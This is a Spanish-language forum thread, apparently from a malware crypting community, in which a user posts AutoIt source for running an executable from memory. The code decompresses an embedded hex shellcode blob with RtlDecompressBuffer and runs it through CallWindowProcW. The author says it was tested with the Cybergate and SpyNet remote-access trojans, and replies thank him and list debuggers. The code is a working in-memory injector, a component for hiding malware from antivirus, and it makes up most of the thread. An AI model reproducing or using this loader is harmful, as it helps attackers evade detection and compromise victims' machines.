Mostrar mensajes previos
Ordenar por
por M3 Usa camisa de fuerza

Código: Seleccionar todo

#NoTrayIcon
#;===============================================================================================
#; AutoIt
#; RunExeFromMemory With Compressed ShellCode ( LZNT )
#; Author : M3
#; Mail : [email protected]
#; Release: 03/04/2013
#; Thanks to : TranceXX , Yashed , Pink
#; Referency : http://msdn.microsoft.com/en-us/library/windows/hardware/ff552191(v=vs.85).aspx
#; Tested On : Wi7 x86 with Cybergate | SpyNet | Eicar M3
#; Usage : sInject(BinaryBuffer)
#;===============================================================================================


Func sInject($sBinaryBuffer)

$sShellCode = '0xB9B600305835353842454300383143343030464402460000353335363537003634384230353330290300384200784305143030' & _
'03006C000C3430313838390034354643433634351045373437020E38353001020E393431333343305F0242009A014E0182002433031635C4303700' & _
'3F353544004B000BD8433839000B042930002301170237006334453835463600373235433436333344443200453832300021440246009344414331' & _
'45330030323033434238428037393043303337011900413146334135444500373735334238413528463033020F38000F3338004134463037334134' & _
'40444539373532801C340838323487293033444229812836368075398002334368313033815F31802F815F30A04642374339803D31823D48313842' & _
'809633378086380180284634454230343440323445373541828B424246838F43303635818F4388313734820332344482034833364682033436830B' & _
'3592378313363682AF4337841B8838343882133936318203A8413645820342841B4384179244841745348313463082CBD44143834341840F41006E' & _
'C10F244146C3214230C321423149C3134232C3214233C315424234C31542353436C10D42A8363639C20137C40738C407243934C2254241C3294242' & _
'5236C2394243C40744C325421645C325004D41C111393837DDC24B394083C203C43739C40F001B11C233394437C23339453529C2213946C32141C4' & _
'57413191C311413234C25541330052A1C0A941343533C1154180B929C2013636C30337C363413895C41139C34141C41F4142C329243838C31B3839' & _
'C30938419C3732C111C09EC26D3843C34B243844C33D3845C345384649C33B3930C3033931C4013289C3193933C321393434C27D48393537C27939' & _
'36C11D3863408341E74646354047400336774303C11E4003374303412440033877C406C023400339C4064015400341B74303C1E8400342A301A408' & _
'43A30167E1116003A2814646A112A00145276403A308830146372227383025E4003123483832233C383339233E3834231CA00823253637C9224638' & _
'37231B3634C309E1527D802B35A3016108A001E51C621936EDE41C35A301E41C36E0242005E41CFD631936E41CA408E41C21322005E51CFBA308E4' & _
'1C3460196003E51C6046A001ED431146216CA01730C301E144A0016631A301230C37326403621137B633A401220C37E41BA31D356403B1A1503835' & _
'356403A30835641F6D230C35641FA31D35653C220C35EF653C202AA0086A3C35651FE0646003DB651F621135641FA31D35653CA21D5E35651FE076' & _
'E006431846631136FB641FE31436641F2154A024651F220CB636E41BA31D346518E214346518EDA248346518222F34E53763036518F16086383534' & _
'651863036418E32276346518E222346418A340842B46DFA42B6518E322E537A216356418A116F360D9647E4542A11FE001007C617C544544637645' & _
'647A4562AA38AC3533E41AA32A336A33336A33DA336A3333E41A632C33E41AA315B633E41A237533EA1A442C462375FE34E51AE328E51A63256533' & _
'630304077FE175A02AC4237149D000B427731B3275740A34B06738F071C320F30632DB750A721432F517721432740A7403DB3424734933750AB220' & _
'33740A931AF633740A133A33750A9302740A5143B7B016740A530B33F425308944700A6D540B35D18990783510073035342B3288320130128B45B2' & _
'00453001707D313338344435410030463835453530311BF18E507E351202008038423581C00438443034303251041A445190355000700335303476' & _
'35F291B00343808AB20350084444344652104242340494430036303431383030343042383346301F508236382044343542469F0A4333A991014143' & _
'9F0143E00A30350A117006303346B2173530366241D09B464433F10E202A37F43835350834809B7509552A9F05F13107383531742BF001580CD305' & _
'DB110630003474001207383F083008CBD10BB07C30710045411418600B99906B35469018B00642341114EF30A5409E901899074614045076321A06' & _
'46701097033641343036F770146315711A44F118D005330DD3007F5F055305305BB423D302B905109D38DF110B210D7805001ED1003030AD5701BB' & _
'FF05120A38130271A1806D3654AB3C4334E06F50AB11A656253035A646500C7219424490A545D0ABA03844313439700043F0ADBD38274430B1802D' & _
'7028C02935B1019C303131B2C0B111033131320141F21435323334303020308E4331015B155030383433D1A848424243F0213038332A30B7A00A51' & _
'2FB11C367436DF11433029FF21103303F101D0055440322791B1361D2531334451B23232D03638353E42B4063106D66FDF1D3F0635317B3B06C019' & _
'34F564FF0330085D09351646403D90174540144332'


If Not @Compiled Then

MsgBox(0,'Crash','Compile Code To Test' ,2)
Exit

Endif

$FormatDecompress = '2'

$sLenBuffer = StringLen($sShellCode)

$sAllocateBufferBinary = 0x7A120

$sStructure = DllStructCreate ('Boolean[' & $sLenBuffer & ']' & ';Boolean[' & $sLenBuffer & ']' & _
';Boolean[' & $sLenBuffer & ']' & ';Boolean[' & $sAllocateBufferBinary & ']' )

DllStructSetData($sStructure , 1 , $sShellCode)

$UncompressedBufferSize = DllStructGetSize($sStructure)

$CompressedBuffer = DllStructGetPtr($sStructure , 1)

$PointerUncompressedBuffer = DllStructGetPtr($sStructure , 2)

$sFinalSizeBuffer = $UncompressedBufferSize

sRtlDecompress($FormatDecompress , $PointerUncompressedBuffer, $UncompressedBufferSize, $CompressedBuffer , $sFinalSizeBuffer)

$sLenBuffer = $sLenBuffer - 0x8C

$sStructurePointer = DllStructCreate('Boolean[' & $sLenBuffer & ']' , $PointerUncompressedBuffer)

$sStructureDecompressed = DllStructGetData($sStructurePointer, 1)

$sDecompressed = BinaryToString($sStructureDecompressed)

DllStructSetData($sStructure, 3, $sDecompressed)

DllStructSetData($sStructure, 4, $sBinaryBuffer)

$sShellCodePtr = DllStructGetPtr($sStructure , 3)

$sBinaryDataPtr = DllStructGetPtr($sStructure , 4)

Call (sCWPW ($sShellCodePtr, $sBinaryDataPtr , 0 , 0 , 0 ))

EndFunc





Func sRtlDecompress ($CompressType , $sUncompressedBuffer , $sUncompressedBufferSize , $sCompressedBuffer , $FinalUncompressedSize )

Local $Ret = DllCall('Ntdll', 'int', 'RtlDecompressBuffer' , 'ushort', $CompressType , 'long', $sUncompressedBuffer , 'long', _
$sUncompressedBufferSize ,'long', $sCompressedBuffer, 'long', $FinalUncompressedSize , 'ulong*' , 0)

EndFunc




Func sCWPW($pPrevWndProc, $hWnd, $iMsg, $wParam, $lParam)

Local $Ret = DllCall('User32', 'lresult', 'CallWindowProcW', 'ptr', $pPrevWndProc, 'hwnd', $hWnd, 'uint', $iMsg, 'wparam', $wParam, 'lparam', $lParam)

EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
por M3 Usa camisa de fuerza
x4r0r escribió:GRANDE

Muchas gracias bro , espero que tenga servido a mas de uno ...

PD : mirando bien al post , se me olvido mencionar el author del Shellcode sin compression , és de DeadlyVermilion ,

se podeis editem el post en los agradecimientos

Indetectables RAT v.0.9.5

@Indetectables Team
por x4r0r Delirios esporádicos
cual es el blog de ese parce no lo veo en la red o seguro no busco bien thanks
Ida pro 5.0
ollydbg
Windbg
Inmunytydebugger
Hexing
y un cerebro

Mostrar/Ocultar

Temas similares
shellcode injection básico por aficionadohxc en Dudas y Preguntas
Variantes de tema
Responder

Volver a “Fuentes”